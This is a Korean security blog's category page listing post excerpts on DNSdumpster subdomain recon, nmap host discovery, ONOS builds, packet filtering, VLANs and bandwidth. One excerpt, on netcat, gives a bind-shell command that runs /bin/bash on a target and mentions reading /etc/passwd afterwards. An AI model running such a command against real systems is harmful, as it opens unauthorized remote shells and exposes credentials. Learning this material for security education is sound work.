Security in CPS/Networking
-
dnsdumpster.comSecurity in CPS/Networking 2021. 12. 22. 07:52
DNS 서버 탐색을 위해 nslookup이나 dig 를 많이 사용하게되는데요. 이 두가지 툴로는 DNS 서버의 Subdomain을 확인하기엔 한계가 있습니다. 그래서 DNSDumpster 사이트를 통해 DNS 서버가 제공하는 서브도메인 정보를 확인할 수 있습니다. https://dnsdumpster.com/ DNSdumpster.com - dns recon and research, find and lookup dns records Attack The ability to quickly identify the attack surface is essential. Whether you are penetration testing or chasing bug bounties. Defend Network defende..
-
Netcat 을 이용한 커맨트 컨트롤Security in CPS/Networking 2021. 6. 17. 11:57
Netcat 은 TCP 또는 UDP 연결을 통해 원격으로 읽기 쓰기를 지원해 주는 네트워크 툴입니다. Netcat 치트시트는 아래에서 다운로드 가능합니다. https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf [타켓] 접근하려는 타켓에서 네트워크를 통한 입력값을 기다린다. 아래 코멘드가 리모트로 전달되어 타켓에서 수행이 된다면 해당 머신에 접근이 가능합니다. 다만 옵션의 경우 우분투에서는 지원하지 않아 칼리 리눅스에서 확인하였습니다. nc -l -p -e '/bin/bash' & [공격자] nc 공격자는 이후 /etc/passwd 와 같은 사용자의 민감한 정보에 접근이 가능합니다.
-
Host discovery by nmapSecurity in CPS/Networking 2020. 12. 14. 14:29
네트워크에 연결된 타켓 호스트의 주소 (IP) 를 확인하기 위해서는 nmap (Network mapper)을 사용합니다. nmap은 무료 오픈소스로 다양하고 강력한 기능(옵션)을 제공하고 있습니다. 호스트 서버의 footprint를 포함하여 IP 나 오픈된 포트 정보를 가져올 수 있습니다. 뿐만 아니라 내부적으로 정의된 타이밍 옵션에 따라 네트워크 보안을 위해 설치된 NIDS 에 탐지를 회피하거나 방화벽에 의한 차단을 방지할 수 있는 기능들도 제공하고 있습니다. 그럼 이제부터 nmap의 옵션들과 검색 성능 등에 대해 좀 더 자세히 알아보도록 하겠습니다. 1. 홈페이지 및 설치 nmap.org/ Nmap: the Network Mapper - Free Security Scanner Nmap 7.90 has..
-
[onos] mvn build 시 .oar 파일이 존재하지 않는 경우Security in CPS/Networking 2020. 8. 31. 15:47
onos-create-app 으로 어플 생성시 app 이 아닌 bundle 이나 cli 을 overlay하여 프로젝트를 만들 경우, 빌드시 .jar 파일만 생성입니다. ONOS target 에 app 으로 설치하려면 .oar (ONOS app achieve) 파일이 필요한 경우가 있습니다. pom.xml 파일을 보면 onos.app.name property 가 주석처리되어 있거나 없는 경우인데, 이를 추가만 해주면 생성할 수 있습니다. org.foo.app foo all ...
-
Stateless Packet Filtering vs Stateful Packet FilteringSecurity in CPS/Networking 2020. 8. 26. 09:22
Stateless Packet Filtering (aka. Static Filtering): 미리 정의된 규칙에 따라 들어오는 패킷을 처리하는 방식. 즉 매칭되는 패킷에 대해 네트워크 유입 여부를 Permit/Deny 하는 방식 Stateful Packet Filtering (aka. Stateful Inspection, Stateful Packet Inspection, or Dynamic Filtering): 두 End-hosts/Clients 간의 상태에 따라 패킷을 Drop할지 허용할지를 결정하는 방식. 예를 들어 Inbound packet 에 대해 Denied를 하더라고 Outbound 로 전달되는 패킷의 Response packet에 대해 허용 여부를 결정하는 방식. Table 생성 - Stat..
-
Native VLAN (untagged VLAN)Security in CPS/Networking 2020. 8. 25. 21:37
(필요성: Truck 포트를 통해 전달되는 Frame 에 VLan 정보를 포함되는 경우 이를 VLAN 정보를 처리하지 못하는 PC (e.g, 허브에 연결된)에서 의도치 않게 Drop이 발생 설명: 이를 극복하기 위해 특정 Vlan (e.g., vlan == 2)를 가진 프레임이 Trunk 포트로 전달되는 경우 Vlan 정보를 제거한 후 전달하고 Vlan 정보가 없는 경우 Default vlan tag 를 추가해 Vlan에 매칭이 되는 포트로 Frame을 전달합니다. 별도의 설정이 없는 경우 Default 값은 Vlan == 1 으로 설정되어 있다고 합니다.
-
Bandwidth vs ThroughputSecurity in CPS/Networking 2020. 8. 25. 21:20
Bandwidth: HW port 로 전달할 수 있는 최대 bit 수 (bit/s) Throughput: 데이터를 기준으로 전달될 수 있는 Frame only 크기 (bit/s) Maximum Throughput 는 Frame size 가 Maximum MTU (i.e., 1518 byte)일 때의 데이터 크기 / s Bandwidth (signal) Throughput (Data) 1 bps 1 bps 1 kbps = 1000 bps 1 Kbps = 1024 bps 1 Mbps = 1000 kbps 1 Mbps = 1024 Kbps 1 Gbps = 1000 Mbps 1 Gbps = 1024 Mbps Goodput: Throughput 은 L2, L3, L4의 헤더를 포함한 데이터의 크기인 반면, Goo..